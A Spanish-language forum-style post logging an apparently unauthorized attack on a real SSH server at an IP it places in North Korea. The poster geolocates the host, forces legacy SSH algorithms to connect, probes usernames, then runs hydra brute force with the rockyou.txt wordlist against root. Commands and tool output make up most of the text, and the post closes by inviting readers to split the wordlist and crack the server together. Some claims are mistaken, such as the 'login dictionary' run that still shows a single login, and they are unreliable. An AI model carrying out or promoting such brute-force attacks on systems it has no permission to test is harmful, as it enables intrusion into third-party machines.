Se recomienda ver la wiki anterior nmap para entenderlo mejor

hydra@kp:~$ mmdblookup –file Descargas/maxmind/GeoLite2-City.mmdb –ip 175.45.178.129

{
    "continent":
      {
        "code":
          "AS" <utf8_string>
        "geoname_id":
          6255147 <uint32>
        "names":
          {
            "de":
              "Asien" <utf8_string>
            "en":
              "Asia" <utf8_string>
            "es":
              "Asia" <utf8_string>
            "fr":
              "Asie" <utf8_string>
            "ja":
              "アジア" <utf8_string>
            "pt-BR":
              "Ásia" <utf8_string>
            "ru":
              "Азия" <utf8_string>
            "zh-CN":
              "亚洲" <utf8_string>
          }
      }
    "country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
    "location":
      {
        "accuracy_radius":
          50 <uint16>
        "latitude":
          40.000000 <double>
        "longitude":
          127.000000 <double>
        "time_zone":
          "Asia/Pyongyang" <utf8_string>
      }
    "registered_country":
      {
        "geoname_id":
          1873107 <uint32>
        "iso_code":
          "KP" <utf8_string>
        "names":
          {
            "de":
              "Nordkorea" <utf8_string>
            "en":
              "North Korea" <utf8_string>
            "es":
              "Corea del Norte" <utf8_string>
            "fr":
              "Corée du Nord" <utf8_string>
            "ja":
              "韓国、朝鮮民主主義人民共和国" <utf8_string>
            "pt-BR":
              "Coreia do Norte" <utf8_string>
            "ru":
              "КНДР" <utf8_string>
            "zh-CN":
              "朝鲜" <utf8_string>
          }
      }
  }

hydra@kp:~$ mmdblookup –file Descargas/maxmind/GeoLite2-City.mmdb –ip 175.45.178.129 | grep -oE '[0-9]{1,3}\.[0-9]{6}'
40.000000
127.000000

El host físico se encuentra a 2.15 km de la carretera más cercana

hydra@kp:~$ ssh root@175.45.178.129
Unable to negotiate with 175.45.178.129 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
hydra@kp:~$

Para poder establecer la conexión debemos especificar el uso de un algoritmo antiguo

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc
root@175.45.178.129

(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
root@175.45.178.129's password:
Connection closed by 175.45.178.129 port 22

Como vemos no pide clave de autenticación para que sólo pueda conectarse un cliente reconocido, por lo que cualquiera puede hacer un ataque de fuerza. Permite 4 intentos máximos y se cierra la conexión, lo típico y normal, pero como veremos más adelante ésto se lo salta hydra

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc
corea@175.45.178.129
(corea@175.45.178.129) Password:
(corea@175.45.178.129) Password:

tambien un usuario corea?

Damos ctrl + c

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc
kp@175.45.178.129
(kp@175.45.178.129) Password:

kp?
Damos ctrl +c

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc
nhzx@175.45.178.129

(nhzx@175.45.178.129) Password:

Podemos observar que el servidor pide contraseña aún no existiendo el nombre de usuario (como en todas las distribuciones Gnu/Linux), ésto va a dificultar el ataque de fuerza bruta porque no podemos deducir cual es. Una opción es usar rockyou.txt para el login y también para el password. pero como lo normal es tener un usuario root no nos vamos a complicar

En hydra no es necesario especificar ningún algoritmo para establecer la comunicación

Descargamos rockyou.txt con wget https://github.com/brannondorsey/naive-h...ockyou.txt

hydra -l root -P Descargas/rockyou.txt ssh:175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 17:06:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh:175.45.178.129:22/
[STATUS] 449.00 tries/min, 449 tries in 00:01h, 14343982 to do in 532:27h, 16 active

[STATUS] 214.67 tries/min, 644 tries in 00:03h, 14343787 to do in 1113:39h, 16 active
[STATUS] 196.57 tries/min, 1376 tries in 00:07h, 14343055 to do in 1216:07h, 16 active
[STATUS] 204.33 tries/min, 3065 tries in 00:15h, 14341366 to do in 1169:47h, 16 active
[STATUS] 227.48 tries/min, 7052 tries in 00:31h, 14337379 to do in 1050:26h, 16 active
[STATUS] 216.09 tries/min, 10156 tries in 00:47h, 14334275 to do in 1105:37h, 16 active

Lo mismo pero utilizando también rockyou.txt como diccionario para login

hydra@kp:~$ hydra -l Descargas/rockyou.txt -P Descargas/rockyou.txt ssh:175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these \*\*\* ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 18:54:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh:175.45.178.129:22/
[STATUS] 569.00 tries/min, 569 tries in 00:01h, 14343862 to do in 420:09h, 16 active
[STATUS] 394.00 tries/min, 1182 tries in 00:03h, 14343249 to do in 606:45h, 16 active

Como vemos funciona y se salta el límite de los 4 intentos cuando intentamos acceder de forma manual.

Sería más rápido, eficiente e interesante unir fuerzas dividiendo el fichero rockyou.txt en varias partes y que entre todos sacasemos el password y el user